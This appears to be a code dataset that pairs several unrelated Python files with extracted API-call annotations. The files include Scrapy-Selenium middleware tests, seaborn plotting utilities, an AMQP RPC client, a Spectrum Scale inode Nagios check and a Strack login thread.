assert False # TODO: implement your test here
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main"
] |
[((1129, 1144), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1142, 1144), False, 'import unittest\n')]
|
"""This module contains the test cases for the middlewares of the ``scrapy_selenium`` package"""
from shutil import which
from unittest import TestCase
from unittest.mock import patch
from scrapy import Request, Spider
from scrapy.exceptions import NotConfigured
from scrapy.settings import Settings
from scrapy.utils.test import get_crawler
from scrapy_selenium.http import SeleniumRequest
from scrapy_selenium.middlewares import SeleniumMiddleware
class SeleniumMiddlewareTestCase(TestCase):
"""Test case for the ``SeleniumMiddleware`` middleware"""
def setUp(self):
"""Initialize the middleware"""
self.settings = Settings({
'SELENIUM_DRIVER_NAME': 'firefox',
'SELENIUM_DRIVER_EXECUTABLE_PATH': which('geckodriver'),
'SELENIUM_DRIVER_ARGUMENTS': ['-headless']
})
self.crawler = get_crawler(Spider, self.settings)
self.spider = self.crawler._create_spider('foo')
self.mw = SeleniumMiddleware.from_crawler(self.crawler)
def tearDown(self):
"""Close the selenium webdriver"""
self.mw.driver.quit()
def test_from_crawler_method_exception(self):
settings = Settings({'SELENIUM_DRIVER_ARGUMENTS': ['-headless']})
crawler = get_crawler(Spider, settings)
with self.assertRaisesRegex(NotConfigured, 'SELENIUM_DRIVER_NAME'):
SeleniumMiddleware.from_crawler(crawler)
settings.update({"SELENIUM_DRIVER_NAME": 'firefox'})
crawler = get_crawler(Spider, settings)
with self.assertRaisesRegex(NotConfigured, 'SELENIUM_DRIVER_EXECUTABLE_PATH'):
SeleniumMiddleware.from_crawler(crawler)
settings.update({'SELENIUM_DRIVER_EXECUTABLE_PATH': which('geckodriver')})
crawler = get_crawler(Spider, settings)
mw = SeleniumMiddleware.from_crawler(crawler)
mw.driver.quit()
def test_from_crawler_method_via_browser_executable_path(self):
self.settings.update({'SELENIUM_DRIVER_NAME': 'firefox'})
self.settings.update({'SELENIUM_BROWSER_EXECUTABLE_PATH': which('firefox')})
crawler = get_crawler(Spider, self.settings)
mw = SeleniumMiddleware.from_crawler(crawler)
self.assertEqual(which('firefox'), mw.driver.binary._start_cmd)
mw.driver.close()
def test_from_crawler_method_should_initialize_the_driver(self):
"""Test that the ``from_crawler`` method should initialize the selenium driver"""
crawler = get_crawler(Spider, self.settings)
mw = SeleniumMiddleware.from_crawler(crawler)
# The driver must be initialized
self.assertIsNotNone(mw.driver)
# We can now use the driver
mw.driver.get('http://www.python.org')
self.assertIn('Python', mw.driver.title)
mw.driver.close()
def test_from_crawler_method_should_initialize_the_grid(self):
"""Test that the ``from_crawler`` method should initialize the selenium grid"""
self.settings.update({
'SELENIUM_REMOTE_URL': 'http://localhost:4444/wd/hub'
})
crawler = get_crawler(Spider, self.settings)
mw = SeleniumMiddleware.from_crawler(crawler)
mw.driver.get('http://www.python.org')
self.assertIn('Python', mw.driver.title)
mw.driver.close()
def test_spider_closed_should_close_the_driver(self):
"""Test that the ``spider_closed`` method should close the driver"""
crawler = get_crawler(Spider, self.settings)
mw = SeleniumMiddleware.from_crawler(crawler)
with patch.object(mw.driver, 'quit') as mocked_quit:
mw.spider_closed()
mocked_quit.assert_called_once()
def test_process_request_should_return_none_if_not_selenium_request(self):
"""Test that the ``process_request`` should return none if not selenium request"""
scrapy_request = Request(url='http://not-an-url')
self.assertIsNone(
self.mw.process_request(
request=scrapy_request,
spider=None
)
)
def test_process_request_should_return_a_response_if_selenium_request(self):
"""Test that the ``process_request`` should return a response if selenium request"""
selenium_request = SeleniumRequest(url='http://www.python.org')
html_response = self.mw.process_request(
request=selenium_request,
spider=None
)
# We have access to the driver on the response via the "meta"
self.assertEqual(
html_response.meta['driver'],
self.mw.driver
)
# We also have access to the "selector" attribute on the response
self.assertEqual(
html_response.selector.xpath('//title/text()').extract_first(),
'Welcome to Python.org'
)
def test_process_request_should_return_a_screenshot_if_screenshot_option(self):
"""Test that the ``process_request`` should return a response with a screenshot"""
selenium_request = SeleniumRequest(
url='http://www.python.org',
screenshot=True
)
html_response = self.mw.process_request(
request=selenium_request,
spider=None
)
self.assertIsNotNone(html_response.meta['screenshot'])
def test_process_request_should_execute_script_if_script_option(self):
"""Test that the ``process_request`` should execute the script and return a response"""
selenium_request = SeleniumRequest(
url='http://www.python.org',
script='document.title = "scrapy_selenium";'
)
html_response = self.mw.process_request(
request=selenium_request,
spider=None
)
self.assertEqual(
html_response.selector.xpath('//title/text()').extract_first(),
'scrapy_selenium'
)
|
[
"unittest.mock.patch.object",
"scrapy.Request",
"scrapy.settings.Settings",
"scrapy_selenium.http.SeleniumRequest",
"shutil.which",
"scrapy.utils.test.get_crawler",
"scrapy_selenium.middlewares.SeleniumMiddleware.from_crawler"
] |
[((863, 897), 'scrapy.utils.test.get_crawler', 'get_crawler', (['Spider', 'self.settings'], {}), '(Spider, self.settings)\n', (874, 897), False, 'from scrapy.utils.test import get_crawler\n'), ((973, 1018), 'scrapy_selenium.middlewares.SeleniumMiddleware.from_crawler', 'SeleniumMiddleware.from_crawler', (['self.crawler'], {}), '(self.crawler)\n', (1004, 1018), False, 'from scrapy_selenium.middlewares import SeleniumMiddleware\n'), ((1187, 1241), 'scrapy.settings.Settings', 'Settings', (["{'SELENIUM_DRIVER_ARGUMENTS': ['-headless']}"], {}), "({'SELENIUM_DRIVER_ARGUMENTS': ['-headless']})\n", (1195, 1241), False, 'from scrapy.settings import Settings\n'), ((1260, 1289), 'scrapy.utils.test.get_crawler', 'get_crawler', (['Spider', 'settings'], {}), '(Spider, settings)\n', (1271, 1289), False, 'from scrapy.utils.test import get_crawler\n'), ((1499, 1528), 'scrapy.utils.test.get_crawler', 'get_crawler', (['Spider', 'settings'], {}), '(Spider, settings)\n', (1510, 1528), False, 'from scrapy.utils.test import get_crawler\n'), ((1771, 1800), 'scrapy.utils.test.get_crawler', 'get_crawler', (['Spider', 'settings'], {}), '(Spider, settings)\n', (1782, 1800), False, 'from scrapy.utils.test import get_crawler\n'), ((1814, 1854), 'scrapy_selenium.middlewares.SeleniumMiddleware.from_crawler', 'SeleniumMiddleware.from_crawler', (['crawler'], {}), '(crawler)\n', (1845, 1854), False, 'from scrapy_selenium.middlewares import SeleniumMiddleware\n'), ((2118, 2152), 'scrapy.utils.test.get_crawler', 'get_crawler', (['Spider', 'self.settings'], {}), '(Spider, self.settings)\n', (2129, 2152), False, 'from scrapy.utils.test import get_crawler\n'), ((2166, 2206), 'scrapy_selenium.middlewares.SeleniumMiddleware.from_crawler', 'SeleniumMiddleware.from_crawler', (['crawler'], {}), '(crawler)\n', (2197, 2206), False, 'from scrapy_selenium.middlewares import SeleniumMiddleware\n'), ((2484, 2518), 'scrapy.utils.test.get_crawler', 'get_crawler', (['Spider', 'self.settings'], {}), '(Spider, self.settings)\n', (2495, 2518), False, 'from scrapy.utils.test import get_crawler\n'), ((2532, 2572), 'scrapy_selenium.middlewares.SeleniumMiddleware.from_crawler', 'SeleniumMiddleware.from_crawler', (['crawler'], {}), '(crawler)\n', (2563, 2572), False, 'from scrapy_selenium.middlewares import SeleniumMiddleware\n'), ((3097, 3131), 'scrapy.utils.test.get_crawler', 'get_crawler', (['Spider', 'self.settings'], {}), '(Spider, self.settings)\n', (3108, 3131), False, 'from scrapy.utils.test import get_crawler\n'), ((3145, 3185), 'scrapy_selenium.middlewares.SeleniumMiddleware.from_crawler', 'SeleniumMiddleware.from_crawler', (['crawler'], {}), '(crawler)\n', (3176, 3185), False, 'from scrapy_selenium.middlewares import SeleniumMiddleware\n'), ((3465, 3499), 'scrapy.utils.test.get_crawler', 'get_crawler', (['Spider', 'self.settings'], {}), '(Spider, self.settings)\n', (3476, 3499), False, 'from scrapy.utils.test import get_crawler\n'), ((3513, 3553), 'scrapy_selenium.middlewares.SeleniumMiddleware.from_crawler', 'SeleniumMiddleware.from_crawler', (['crawler'], {}), '(crawler)\n', (3544, 3553), False, 'from scrapy_selenium.middlewares import SeleniumMiddleware\n'), ((3886, 3918), 'scrapy.Request', 'Request', ([], {'url': '"""http://not-an-url"""'}), "(url='http://not-an-url')\n", (3893, 3918), False, 'from scrapy import Request, Spider\n'), ((4279, 4323), 'scrapy_selenium.http.SeleniumRequest', 'SeleniumRequest', ([], {'url': '"""http://www.python.org"""'}), "(url='http://www.python.org')\n", (4294, 4323), False, 'from scrapy_selenium.http import SeleniumRequest\n'), ((5049, 5110), 'scrapy_selenium.http.SeleniumRequest', 'SeleniumRequest', ([], {'url': '"""http://www.python.org"""', 'screenshot': '(True)'}), "(url='http://www.python.org', screenshot=True)\n", (5064, 5110), False, 'from scrapy_selenium.http import SeleniumRequest\n'), ((5531, 5626), 'scrapy_selenium.http.SeleniumRequest', 'SeleniumRequest', ([], {'url': '"""http://www.python.org"""', 'script': '"""document.title = "scrapy_selenium";"""'}), '(url=\'http://www.python.org\', script=\n \'document.title = "scrapy_selenium";\')\n', (5546, 5626), False, 'from scrapy_selenium.http import SeleniumRequest\n'), ((1378, 1418), 'scrapy_selenium.middlewares.SeleniumMiddleware.from_crawler', 'SeleniumMiddleware.from_crawler', (['crawler'], {}), '(crawler)\n', (1409, 1418), False, 'from scrapy_selenium.middlewares import SeleniumMiddleware\n'), ((1628, 1668), 'scrapy_selenium.middlewares.SeleniumMiddleware.from_crawler', 'SeleniumMiddleware.from_crawler', (['crawler'], {}), '(crawler)\n', (1659, 1668), False, 'from scrapy_selenium.middlewares import SeleniumMiddleware\n'), ((2232, 2248), 'shutil.which', 'which', (['"""firefox"""'], {}), "('firefox')\n", (2237, 2248), False, 'from shutil import which\n'), ((3568, 3599), 'unittest.mock.patch.object', 'patch.object', (['mw.driver', '"""quit"""'], {}), "(mw.driver, 'quit')\n", (3580, 3599), False, 'from unittest.mock import patch\n'), ((751, 771), 'shutil.which', 'which', (['"""geckodriver"""'], {}), "('geckodriver')\n", (756, 771), False, 'from shutil import which\n'), ((1730, 1750), 'shutil.which', 'which', (['"""geckodriver"""'], {}), "('geckodriver')\n", (1735, 1750), False, 'from shutil import which\n'), ((2081, 2097), 'shutil.which', 'which', (['"""firefox"""'], {}), "('firefox')\n", (2086, 2097), False, 'from shutil import which\n')]
|
"""Utilities for data visualisation."""
from pathlib import Path
from typing import Optional, Union
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
FIGSIZE = (4, 4)
FONTSIZE = 12
sns.set_theme()
def plot_calibration(
predicted_pi: np.ndarray,
observed_pi: np.ndarray,
fname: Optional[Union[str, Path]] = None,
):
"""Plot miscalibration curve.
Args:
predicted_pi (:obj:`np.ndarray`): The predicted percentile intervals.
observed_pi (:obj:`np.ndarray`): The observed percentile intervals.
fname (str or :obj:`Path`, optional): The file to save the plot.
Defaults to `None`, which shows the plot but does not save it.
"""
plt.figure(figsize=FIGSIZE)
ax_ideal = sns.lineplot([0, 1], [0, 1], label="ideal")
ax_ideal.lines[0].set_linestyle("--")
sns.lineplot(predicted_pi, observed_pi)
plt.fill_between(
predicted_pi,
predicted_pi,
observed_pi,
alpha=0.2,
label="Miscalibration area",
)
ax_ideal.set_xlabel("Expected cumulative distribution")
ax_ideal.set_ylabel("Observed cumulative distribution")
ax_ideal.set_xlim([0, 1])
ax_ideal.set_ylim([0, 1])
if fname:
plt.savefig(fname)
else:
plt.show()
def plot_sharpness(
stdevs: np.ndarray,
sharpness: float,
coeff_var: float,
fname: Optional[Union[str, Path]] = None,
):
"""Plot standard deviation distribution and sharpness.
Args:
stdevs (:obj:`np.ndarray`): An array of the standard deviations.
sharpness (float): The root mean squared of the standard deviations.
coeff_var (float): The coefficient of variation of the standard deviations.
fname (str or :obj:`Path`, optional): The file to save the plot.
Defaults to `None`, which shows the plot but does not save it.
"""
plt.figure(figsize=FIGSIZE)
ax_sharp = sns.distplot(stdevs, kde=False, norm_hist=True)
ax_sharp.set_xlim(left=0.0)
ax_sharp.set_xlabel("Predicted standard deviations (eV)")
ax_sharp.set_ylabel("Normalized frequency")
ax_sharp.set_yticklabels([])
ax_sharp.set_yticks([])
ax_sharp.axvline(x=sharpness, label="sharpness")
xlim = ax_sharp.get_xlim()
if sharpness < (xlim[0] + xlim[1]) / 2:
text = f"\n Sharpness = {sharpness:.2f} eV\n C$_v$ = {coeff_var:.2f}"
h_align = "left"
else:
text = f"\nSharpness = {sharpness:.2f} eV \nC$_v$ = {coeff_var:.2f} "
h_align = "right"
ax_sharp.text(
x=sharpness,
y=ax_sharp.get_ylim()[1],
s=text,
verticalalignment="top",
horizontalalignment=h_align,
fontsize=FONTSIZE,
)
if fname:
plt.savefig(fname)
else:
plt.show()
|
[
"seaborn.lineplot",
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.show",
"matplotlib.pyplot.figure",
"seaborn.distplot",
"matplotlib.pyplot.fill_between",
"seaborn.set_theme"
] |
[((207, 222), 'seaborn.set_theme', 'sns.set_theme', ([], {}), '()\n', (220, 222), True, 'import seaborn as sns\n'), ((716, 743), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'FIGSIZE'}), '(figsize=FIGSIZE)\n', (726, 743), True, 'import matplotlib.pyplot as plt\n'), ((759, 802), 'seaborn.lineplot', 'sns.lineplot', (['[0, 1]', '[0, 1]'], {'label': '"""ideal"""'}), "([0, 1], [0, 1], label='ideal')\n", (771, 802), True, 'import seaborn as sns\n'), ((850, 889), 'seaborn.lineplot', 'sns.lineplot', (['predicted_pi', 'observed_pi'], {}), '(predicted_pi, observed_pi)\n', (862, 889), True, 'import seaborn as sns\n'), ((894, 996), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (['predicted_pi', 'predicted_pi', 'observed_pi'], {'alpha': '(0.2)', 'label': '"""Miscalibration area"""'}), "(predicted_pi, predicted_pi, observed_pi, alpha=0.2, label=\n 'Miscalibration area')\n", (910, 996), True, 'import matplotlib.pyplot as plt\n'), ((1895, 1922), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'FIGSIZE'}), '(figsize=FIGSIZE)\n', (1905, 1922), True, 'import matplotlib.pyplot as plt\n'), ((1938, 1985), 'seaborn.distplot', 'sns.distplot', (['stdevs'], {'kde': '(False)', 'norm_hist': '(True)'}), '(stdevs, kde=False, norm_hist=True)\n', (1950, 1985), True, 'import seaborn as sns\n'), ((1243, 1261), 'matplotlib.pyplot.savefig', 'plt.savefig', (['fname'], {}), '(fname)\n', (1254, 1261), True, 'import matplotlib.pyplot as plt\n'), ((1280, 1290), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1288, 1290), True, 'import matplotlib.pyplot as plt\n'), ((2757, 2775), 'matplotlib.pyplot.savefig', 'plt.savefig', (['fname'], {}), '(fname)\n', (2768, 2775), True, 'import matplotlib.pyplot as plt\n'), ((2794, 2804), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2802, 2804), True, 'import matplotlib.pyplot as plt\n')]
|
import os
import re
import math
path = r"D:\Users\<NAME>\Desktop\GyroData\Data";
list = os.listdir(path)
min = 15000;
def findMin(path1,filename1, min):
file1 = open(path1 +"\\"+ filename1, "r")
lines = file1.readlines()
count = 0
for line in lines:
count = count + 1
if(count<min):
min = count
file1.close()
return min
for count, filename in enumerate(os.listdir(path)):
match = re.match(r"([0-9]+)([a-zA-Z]+)", filename, re.I)
items = match.groups()
if items[1]!="Output" and items[1]!="Recording":
min = create_vec(path,filename,min)
|
[
"re.match",
"os.listdir"
] |
[((91, 107), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (101, 107), False, 'import os\n'), ((410, 426), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (420, 426), False, 'import os\n'), ((442, 489), 're.match', 're.match', (['"""([0-9]+)([a-zA-Z]+)"""', 'filename', 're.I'], {}), "('([0-9]+)([a-zA-Z]+)', filename, re.I)\n", (450, 489), False, 'import re\n')]
|
from rich.traceback import install
install()
|
[
"rich.traceback.install"
] |
[((36, 45), 'rich.traceback.install', 'install', ([], {}), '()\n', (43, 45), False, 'from rich.traceback import install\n')]
|
import asyncio
from rpc_server import amqp_url, square
from aioamqp_consumer import RpcClient
async def main():
async with RpcClient(amqp_url) as client:
print(await client.wait(square(x=2)))
coros = [
client.wait(square(x=i))
for i in range(10)
]
print(await asyncio.gather(*coros))
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
loop.close()
|
[
"asyncio.gather",
"aioamqp_consumer.RpcClient",
"asyncio.get_event_loop",
"rpc_server.square"
] |
[((389, 413), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (411, 413), False, 'import asyncio\n'), ((131, 150), 'aioamqp_consumer.RpcClient', 'RpcClient', (['amqp_url'], {}), '(amqp_url)\n', (140, 150), False, 'from aioamqp_consumer import RpcClient\n'), ((251, 262), 'rpc_server.square', 'square', ([], {'x': 'i'}), '(x=i)\n', (257, 262), False, 'from rpc_server import amqp_url, square\n'), ((325, 347), 'asyncio.gather', 'asyncio.gather', (['*coros'], {}), '(*coros)\n', (339, 347), False, 'import asyncio\n'), ((194, 205), 'rpc_server.square', 'square', ([], {'x': '(2)'}), '(x=2)\n', (200, 205), False, 'from rpc_server import amqp_url, square\n')]
|
# coding: utf-8
# See: https://forum.omz-software.com/topic/2374/is-there-a-way-to-programmatically-highlight-a-ui-segmentedcontrol
import ui
class SegNav(ui.View):
def __init__(self):
self.present()
self.name = 'SegNav'
seg = ui.SegmentedControl()
seg.action = self.seg_view_action
seg.background_color = 'white'
seg.flex = 'W'
seg.height = 40
seg.segments = 'even', 'odd'
seg.selected_index = 0 # set the highlight
seg.width = self.bounds.w
self.add_subview(seg)
x, y, w, h = self.bounds
self.table_view = ui.TableView()
self.table_view.data_source = ui.ListDataSource(range(0, 42, 2))
self.table_view.flex = 'WH'
self.table_view.frame = x, y + seg.height, w, h - seg.height
self.add_subview(self.table_view)
def seg_view_action(self, sender):
# print(sender.segments[sender.selected_index])
self.table_view.data_source.items = range(sender.selected_index, 42, 2)
SegNav()
|
[
"ui.SegmentedControl",
"ui.TableView"
] |
[((258, 279), 'ui.SegmentedControl', 'ui.SegmentedControl', ([], {}), '()\n', (277, 279), False, 'import ui\n'), ((621, 635), 'ui.TableView', 'ui.TableView', ([], {}), '()\n', (633, 635), False, 'import ui\n')]
|
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import TestCase
from datetime import datetime
from datetime import timedelta
from dino import environ
from dino.config import ConfigKeys
from dino.rest.resources.banned import BannedResource
__author__ = '<NAME> <<EMAIL>>'
from dino.rest.resources.rooms import RoomsResource
class FakeDb(object):
def set_all_rooms(self):
pass
def get_all_rooms(self):
return [
{
'id': '1',
'status': 'private',
'name': 'foo',
'channel': 'foo channel'
},
{
'id': '2',
'status': 'public',
'name': 'bar',
'channel': 'bar channel'
},
]
class RoomsTest(TestCase):
def setUp(self):
environ.env.db = FakeDb()
self.resource = RoomsResource()
def test_get(self):
self.assertEqual(2, len(self.resource.do_get()))
def test_set_last_cleared(self):
last_cleared = self.resource._get_last_cleared()
self.resource._set_last_cleared(datetime.utcnow()+timedelta(minutes=5))
self.assertNotEqual(last_cleared, self.resource._get_last_cleared())
|
[
"datetime.datetime.utcnow",
"dino.rest.resources.rooms.RoomsResource",
"datetime.timedelta"
] |
[((1416, 1431), 'dino.rest.resources.rooms.RoomsResource', 'RoomsResource', ([], {}), '()\n', (1429, 1431), False, 'from dino.rest.resources.rooms import RoomsResource\n'), ((1649, 1666), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (1664, 1666), False, 'from datetime import datetime\n'), ((1667, 1687), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (1676, 1687), False, 'from datetime import timedelta\n')]
|
#!/usr/bin/python
################################################################################
# Name: Check IBM Spectrum Scale / GPFS inode stats
# Dependencies: - IBM Spectrum Scale
################################################################################
import os
import subprocess
import sys
import re
import string
import argparse
################################################################################
# # Variable definition for Nagios
################################################################################
STATE_OK = 0
STATE_WARNING = 1
STATE_CRITICAL = 2
STATE_UNKNOWN = 3
def checkRequirments():
"""
Check if following tools are installed on the system: IBM Spectrum Scale
"""
if not (os.path.isdir("/usr/lpp/mmfs/bin/") and os.path.isfile("/usr/lpp/mmfs/bin/mmgetstate") ):
print(str(STATE_CRITICAL) + "CRITICAL - No IBM Spectrum Scale Installation detected." )
def checkStatusDevice(args):
outputS=""
criticalFlag=0
if args.fset:
fdout = executeBashCommand("sudo /usr/lpp/mmfs/bin/mmlsfileset " + args.device + " root,"+args.fset +" -iY")
else:
fdout = executeBashCommand("sudo /usr/lpp/mmfs/bin/mmlsfileset " + args.device + " -iY")
'''
position 32 - MaxInodes
position 33 - AllocInodes
position 14 - Used
position 7 - FileSet name
'''
for line in fdout.splitlines():
if 'mmlsfileset' in line:
if line.split(':')[7] in {'root'}:
MaxInodesRoot = line.split(':')[33]
for line in fdout.splitlines():
if 'mmlsfileset' in line:
if line.split(':')[7] not in {'root','filesetName'}:
FileSet= line.split(':')[7]
UsedInodes = float (line.split(':')[14])
UsedInodesStr = line.split(':')[14]
MaxInodes = float (line.split(':')[33])
MaxInodesStr = line.split(':')[33]
if int(MaxInodesStr) == 0 :
MaxInodesStr = MaxInodesRoot
MaxInodes = float(MaxInodesRoot)
if 100 * UsedInodes/ MaxInodes > float(args.critical):
print ("CRITICAL - " + line.split(':')[7] )
criticalFlag=2
elif 100 * UsedInodes/ MaxInodes > float(args.warning):
print ("WARNING - " + line.split(':')[7] )
if criticalFlag != 2:
criticalFlag=1
if args.percent:
outputS = outputS + " " + FileSet + "=" + '{:.2f}'.format(100* UsedInodes/ MaxInodes) + "%;" + str(args.warning) + ";" + str(args.critical) + ";0;100; "
elif args.number:
outputS = outputS + " " + FileSet +"_Used=" + UsedInodesStr + ";" + '{:.0f}'.format(float(args.warning) * MaxInodes / 100) +";"+ '{:.0f}'.format(float(args.critical) * MaxInodes / 100)+ ";0;" + MaxInodesStr + "; "
else:
outputS = outputS + " " + FileSet + "=" + '{:.2f}'.format(100* UsedInodes/ MaxInodes) + "%;" + str(args.warning) + ";" + str(args.critical) + ";0;100; " + FileSet +"_Used=" + UsedInodesStr + ";" + '{:.0f}'.format(float(args.warning) * MaxInodes / 100) +";"+ '{:.0f}'.format(float(args.critical) * MaxInodes / 100)+ ";0;" + MaxInodesStr + "; "
print (args.device + "|" + outputS )
sys.exit(criticalFlag)
def executeBashCommand(command):
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
return process.communicate()[0]
def argumentParser():
parser = argparse.ArgumentParser(description='Check inode fileset status')
group = parser.add_argument_group();
subParser = parser.add_subparsers()
nodeParser = subParser.add_parser('device', help='Check inode status for FileSets per Device')
nodeParser.set_defaults(func=checkStatusDevice)
nodeParser.add_argument('-d', '--device', dest='device', action='store', help='Device to get inode stats', required=True)
nodeParser.add_argument('-f', '--fset', dest='fset', action='store', help='Fileset, comma separated, to get inode stats')
nodeParser.add_argument('-w', '--warning', dest='warning', action='store', help='Warning level of inodes utilization, in percent', default=90)
nodeParser.add_argument('-c', '--critical', dest='critical', action='store', help='Critical level of inodes utilization, in percent', default=96)
nodeParser.add_argument('-p', '--percent', dest='percent', action='store_true', help='Show output in percents')
nodeParser.add_argument('-n', '--number', dest='number', action='store_true', help='Show output in numbers')
return parser
if __name__ == '__main__':
checkRequirments()
#checkStatus()
parser = argumentParser()
args = parser.parse_args()
args.func(args)
|
[
"os.path.isdir",
"os.path.isfile",
"argparse.ArgumentParser",
"sys.exit"
] |
[((3453, 3475), 'sys.exit', 'sys.exit', (['criticalFlag'], {}), '(criticalFlag)\n', (3461, 3475), False, 'import sys\n'), ((3667, 3732), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Check inode fileset status"""'}), "(description='Check inode fileset status')\n", (3690, 3732), False, 'import argparse\n'), ((779, 814), 'os.path.isdir', 'os.path.isdir', (['"""/usr/lpp/mmfs/bin/"""'], {}), "('/usr/lpp/mmfs/bin/')\n", (792, 814), False, 'import os\n'), ((819, 865), 'os.path.isfile', 'os.path.isfile', (['"""/usr/lpp/mmfs/bin/mmgetstate"""'], {}), "('/usr/lpp/mmfs/bin/mmgetstate')\n", (833, 865), False, 'import os\n')]
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Time: 2021-11-22 11:43 上午
Author: huayang
Subject:
"""
import os # noqa
import doctest # noqa
# from typing import *
# from itertools import islice
# from collections import defaultdict
# from tqdm import tqdm
import torch
from torch.utils.data import DataLoader
from huaytools.pytorch.data import MultiBertSample, BertDataLoader
def _test_single():
""""""
from sentence_transformers import InputExample, SentenceTransformer
from huaytools.pytorch.nn import get_CKPT_DIR
pt_ckpt_path = os.path.join(get_CKPT_DIR(), 'bert-base-chinese')
st = SentenceTransformer(pt_ckpt_path)
file = ['我爱python', '我爱机器学习', '我爱nlp'] * 3 # 9
# SentenceTransformer
ds_st = [InputExample(texts=[row], label=1) for row in file]
dl_st = DataLoader(ds_st, batch_size=4, collate_fn=st.smart_batching_collate) # noqa
ds_my = [MultiBertSample(texts=[row], label=1) for row in file]
dl_my = BertDataLoader(ds_my, batch_size=4)
for b_st, b_my in zip(dl_st, dl_my):
assert torch.equal(b_st[0][0]['input_ids'], b_my[0][0]['token_ids'])
def _test():
""""""
doctest.testmod()
_test_single()
if __name__ == '__main__':
""""""
_test()
|
[
"huaytools.pytorch.nn.get_CKPT_DIR",
"torch.utils.data.DataLoader",
"sentence_transformers.InputExample",
"torch.equal",
"huaytools.pytorch.data.BertDataLoader",
"huaytools.pytorch.data.MultiBertSample",
"sentence_transformers.SentenceTransformer",
"doctest.testmod"
] |
[((621, 654), 'sentence_transformers.SentenceTransformer', 'SentenceTransformer', (['pt_ckpt_path'], {}), '(pt_ckpt_path)\n', (640, 654), False, 'from sentence_transformers import InputExample, SentenceTransformer\n'), ((811, 880), 'torch.utils.data.DataLoader', 'DataLoader', (['ds_st'], {'batch_size': '(4)', 'collate_fn': 'st.smart_batching_collate'}), '(ds_st, batch_size=4, collate_fn=st.smart_batching_collate)\n', (821, 880), False, 'from torch.utils.data import DataLoader\n'), ((970, 1005), 'huaytools.pytorch.data.BertDataLoader', 'BertDataLoader', (['ds_my'], {'batch_size': '(4)'}), '(ds_my, batch_size=4)\n', (984, 1005), False, 'from huaytools.pytorch.data import MultiBertSample, BertDataLoader\n'), ((1155, 1172), 'doctest.testmod', 'doctest.testmod', ([], {}), '()\n', (1170, 1172), False, 'import doctest\n'), ((575, 589), 'huaytools.pytorch.nn.get_CKPT_DIR', 'get_CKPT_DIR', ([], {}), '()\n', (587, 589), False, 'from huaytools.pytorch.nn import get_CKPT_DIR\n'), ((747, 781), 'sentence_transformers.InputExample', 'InputExample', ([], {'texts': '[row]', 'label': '(1)'}), '(texts=[row], label=1)\n', (759, 781), False, 'from sentence_transformers import InputExample, SentenceTransformer\n'), ((903, 940), 'huaytools.pytorch.data.MultiBertSample', 'MultiBertSample', ([], {'texts': '[row]', 'label': '(1)'}), '(texts=[row], label=1)\n', (918, 940), False, 'from huaytools.pytorch.data import MultiBertSample, BertDataLoader\n'), ((1063, 1124), 'torch.equal', 'torch.equal', (["b_st[0][0]['input_ids']", "b_my[0][0]['token_ids']"], {}), "(b_st[0][0]['input_ids'], b_my[0][0]['token_ids'])\n", (1074, 1124), False, 'import torch\n')]
|
# :coding: utf-8
# :copyright: Copyright (c) 2021 strack
import traceback
from strack_connect.config.log import *
from strack_api.strack import Strack
from dayu_widgets.qt import QThread, Signal
from dayu_widgets.alert import MAlert
import threading
class LoginThread(QThread):
"""Session api by thread"""
# Login Msg signal.
loginMsg = Signal(object, object)
loginSuccessSignal = Signal()
url = ""
username = ""
password = ""
def start(self, url, username, password):
"""Start thread."""
self.url = url
self.username = username
self.password = password
super(LoginThread, self).start()
def _handle_login(self):
"""Login to server with *api_user* and *api_key*."""
session = Session()
res = session.get_token(self.url, self.username, self.password)
if not res['code']:
self.loginMsg.emit(res['msg'], MAlert.ErrorType)
else:
self.loginMsg.emit(res['msg'], MAlert.SuccessType)
self.loginSuccessSignal.emit()
def run(self):
"""Listen for events."""
self._handle_login()
class Session(object):
_instance_lock = threading.Lock()
def __init__(self):
pass
def __new__(cls, *args, **kwargs):
if not hasattr(Session, "_instance"):
with Session._instance_lock:
if not hasattr(Session, "_instance"):
Session._instance = object.__new__(cls)
return Session._instance
@staticmethod
def get_token(url, username, password):
logger = get_logger("api")
try:
strack = Strack(url, username, password)
user_filters = [['id', 'is', strack.user_id]]
user = strack.find('user', user_filters)
print(user)
if not user:
raise RuntimeError('Cannot find user named %s.' % username)
return {
'code': True,
'msg': u"登录成功,正在跳转……"
}
except Exception as err:
logger.error("login failed. Please check login info.")
logger.error(err)
logger.error(traceback.format_exc())
return {
'code': False,
'msg': u"登录失败. %s." % err.args
}
|
[
"threading.Lock",
"strack_api.strack.Strack",
"dayu_widgets.qt.Signal",
"traceback.format_exc"
] |
